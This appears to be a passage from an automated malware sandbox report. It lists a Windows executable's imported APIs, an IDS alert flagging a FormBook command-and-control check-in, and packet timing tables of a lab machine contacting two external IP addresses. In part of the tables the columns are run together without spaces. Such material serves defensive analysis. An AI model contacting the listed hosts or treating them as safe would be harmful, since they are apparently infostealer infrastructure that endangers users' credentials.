KERNEL32.dll | HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
USER32.dll | SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
GDI32.dll | SetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | GetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll | RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-11T09:27:38.335404+0100 | 2856318 | ETPRO MALWARE FormBook CnC Checkin (POST) M4 | 1 | 192.168.2.8 | 49714 | 103.224.182.242 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                              Jan 11, 2025 09:27:24.967123032 CET4970980192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:24.983670950 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.983674049 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.983678102 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.983783960 CET4970980192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:24.983814001 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.983820915 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.983828068 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.983834028 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.983840942 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.983958960 CET4970980192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:24.983959913 CET4970980192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:24.984148026 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.984154940 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.984167099 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.984213114 CET4970980192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:24.984348059 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.984354973 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.984407902 CET4970980192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:24.984874010 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.984925032 CET4970980192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:25.437916994 CET4970980192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:26.445153952 CET4971180192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:26.450098038 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:26.450187922 CET4971180192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:26.465841055 CET4971180192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:26.470758915 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.306538105 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.306564093 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.306581974 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.306588888 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.306596994 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.306680918 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.306751013 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.306756020 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.306771040 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.306777000 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.306842089 CET4971180192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:27.306842089 CET4971180192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:27.306842089 CET4971180192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:27.306843042 CET4971180192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:27.311793089 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.311805964 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.311820030 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.311855078 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.311901093 CET4971180192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:27.311934948 CET4971180192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:27.393729925 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.410902023 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.410917997 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.410965919 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.411005020 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.411040068 CET4971180192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:27.411075115 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.411082029 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.411191940 CET4971180192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:27.411191940 CET4971180192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:27.411418915 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.411483049 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.411489964 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.411550045 CET4971180192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:27.411577940 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.411585093 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.411633968 CET4971180192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:27.412385941 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.412395954 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.412410021 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.412461042 CET4971180192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:27.412477016 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.412486076 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.412533045 CET4971180192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:27.413255930 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.413264036 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.413285017 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.413290977 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.413304090 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.413316965 CET4971180192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:27.413341999 CET4971180192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:27.413363934 CET4971180192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:27.415923119 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.415946007 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.416008949 CET4971180192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:27.441243887 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.441256046 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.441333055 CET4971180192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:27.497566938 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.497582912 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.497765064 CET4971180192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:27.515084982 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.515141964 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.515147924 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.515180111 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.515239954 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.515247107 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.515352964 CET4971180192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:27.515352964 CET4971180192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:27.515353918 CET4971180192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:27.515431881 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.515445948 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.515459061 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.515501022 CET4971180192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:27.515507936 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.515571117 CET4971180192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:27.515664101 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.515736103 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.515743017 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.515800953 CET4971180192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:27.515820026 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.515834093 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.515885115 CET4971180192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:27.516056061 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.516105890 CET4971180192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:27.971262932 CET4971180192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:28.989855051 CET4971280192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:28.994626999 CET8049712134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:28.994781017 CET4971280192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:29.008991003 CET4971280192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:29.013794899 CET8049712134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:29.013952971 CET8049712134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:29.844671011 CET8049712134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:29.844696045 CET8049712134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:29.844706059 CET8049712134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:29.844727039 CET8049712134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:29.844738960 CET8049712134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:29.844789982 CET4971280192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:29.844794989 CET8049712134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:29.844808102 CET8049712134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:29.844861031 CET8049712134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:29.844863892 CET4971280192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:29.844873905 CET8049712134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:29.844902039 CET8049712134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:29.844902992 CET4971280192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:29.844903946 CET4971280192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:29.844959974 CET4971280192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:29.849606037 CET8049712134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:29.849646091 CET8049712134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:29.849658966 CET8049712134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:29.849669933 CET8049712134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:29.849720955 CET4971280192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:29.849720955 CET4971280192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:29.949069977 CET8049712134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:29.949090958 CET8049712134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:29.949112892 CET8049712134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:29.949177980 CET4971280192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:29.949202061 CET8049712134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:29.949223042 CET8049712134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:29.949235916 CET8049712134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:29.949265003 CET4971280192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:29.949281931 CET4971280192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:29.949318886 CET8049712134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:29.949336052 CET8049712134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:29.949470043 CET4971280192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:29.949903011 CET8049712134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:29.949934959 CET8049712134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:29.949975967 CET4971280192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:29.950053930 CET8049712134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:29.950115919 CET8049712134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:29.950126886 CET8049712134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:29.950161934 CET4971280192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:29.950403929 CET8049712134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:29.950448036 CET8049712134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:29.950448990 CET4971280192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:29.950462103 CET8049712134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:29.950511932 CET4971280192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:29.950545073 CET8049712134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:29.950557947 CET8049712134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:29.950572014 CET8049712134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:29.950598001 CET4971280192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:29.951297998 CET8049712134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:29.951324940 CET8049712134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:29.951354027 CET4971280192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:29.951395035 CET8049712134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:29.951409101 CET8049712134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:29.951630116 CET4971280192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:29.977974892 CET8049712134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:29.977996111 CET8049712134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:29.978008986 CET8049712134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:29.978060961 CET4971280192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:29.978060961 CET4971280192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:30.036672115 CET8049712134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:30.053922892 CET8049712134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:30.053951979 CET8049712134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:30.053972006 CET8049712134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:30.053986073 CET8049712134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:30.053998947 CET8049712134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:30.054012060 CET8049712134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:30.054089069 CET4971280192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:30.054102898 CET8049712134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:30.054116964 CET8049712134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:30.054124117 CET4971280192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:30.054162979 CET4971280192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:30.054305077 CET8049712134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:30.054339886 CET8049712134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:30.054351091 CET8049712134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:30.054359913 CET4971280192.168.2.8134.0.14.158
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Jan 11, 2025 09:27:30.054445982 CET  49712        80         192.168.2.8      134.0.14.158
Jan 11, 2025 09:27:30.054480076 CET  80           49712      134.0.14.158     192.168.2.8
Jan 11, 2025 09:27:30.054493904 CET  80           49712      134.0.14.158     192.168.2.8
Jan 11, 2025 09:27:30.054686069 CET  49712        80         192.168.2.8      134.0.14.158
Jan 11, 2025 09:27:30.054868937 CET  80           49712      134.0.14.158     192.168.2.8
Jan 11, 2025 09:27:30.055011988 CET  49712        80         192.168.2.8      134.0.14.158
Jan 11, 2025 09:27:30.518045902 CET  49712        80         192.168.2.8      134.0.14.158
Jan 11, 2025 09:27:31.537091970 CET  49713        80         192.168.2.8      134.0.14.158
Jan 11, 2025 09:27:31.542084932 CET  80           49713      134.0.14.158     192.168.2.8
Jan 11, 2025 09:27:31.542203903 CET  49713        80         192.168.2.8      134.0.14.158
Jan 11, 2025 09:27:31.551673889 CET  49713        80         192.168.2.8      134.0.14.158
Jan 11, 2025 09:27:31.556521893 CET  80           49713      134.0.14.158     192.168.2.8
Jan 11, 2025 09:27:32.368977070 CET  80           49713      134.0.14.158     192.168.2.8
Jan 11, 2025 09:27:32.369386911 CET  80           49713      134.0.14.158     192.168.2.8
Jan 11, 2025 09:27:32.369457006 CET  49713        80         192.168.2.8      134.0.14.158
Jan 11, 2025 09:27:32.371879101 CET  49713        80         192.168.2.8      134.0.14.158
Jan 11, 2025 09:27:32.376743078 CET  80           49713      134.0.14.158     192.168.2.8
Jan 11, 2025 09:27:37.684863091 CET  49714        80         192.168.2.8      103.224.182.242
Jan 11, 2025 09:27:37.689788103 CET  80           49714      103.224.182.242  192.168.2.8
Jan 11, 2025 09:27:37.689910889 CET  49714        80         192.168.2.8      103.224.182.242
Jan 11, 2025 09:27:37.712532997 CET  49714        80         192.168.2.8      103.224.182.242
Jan 11, 2025 09:27:37.717294931 CET  80           49714      103.224.182.242  192.168.2.8
Jan 11, 2025 09:27:38.335285902 CET  80           49714      103.224.182.242  192.168.2.8
Jan 11, 2025 09:27:38.335351944 CET  80           49714      103.224.182.242  192.168.2.8
Jan 11, 2025 09:27:38.335403919 CET  49714        80         192.168.2.8      103.224.182.242
Jan 11, 2025 09:27:39.224688053 CET  49714        80         192.168.2.8      103.224.182.242
Jan 11, 2025 09:27:40.240087032 CET  49715        80         192.168.2.8      103.224.182.242
Jan 11, 2025 09:27:40.244960070 CET  80           49715      103.224.182.242  192.168.2.8
Jan 11, 2025 09:27:40.245107889 CET  49715        80         192.168.2.8      103.224.182.242
Jan 11, 2025 09:27:40.260031939 CET  49715        80         192.168.2.8      103.224.182.242
Jan 11, 2025 09:27:40.264846087 CET  80           49715      103.224.182.242  192.168.2.8
Jan 11, 2025 09:27:40.844782114 CET  80           49715      103.224.182.242  192.168.2.8
Jan 11, 2025 09:27:40.844883919 CET  80           49715      103.224.182.242  192.168.2.8
Jan 11, 2025 09:27:40.844964981 CET  49715        80         192.168.2.8      103.224.182.242
Jan 11, 2025 09:27:41.768171072 CET  49715        80         192.168.2.8      103.224.182.242
Jan 11, 2025 09:27:42.787610054 CET  49716        80         192.168.2.8      103.224.182.242
Jan 11, 2025 09:27:42.792566061 CET  80           49716      103.224.182.242  192.168.2.8
Jan 11, 2025 09:27:42.792651892 CET  49716        80         192.168.2.8      103.224.182.242
Jan 11, 2025 09:27:42.808207035 CET  49716        80         192.168.2.8      103.224.182.242
Jan 11, 2025 09:27:42.813071012 CET  80           49716      103.224.182.242  192.168.2.8
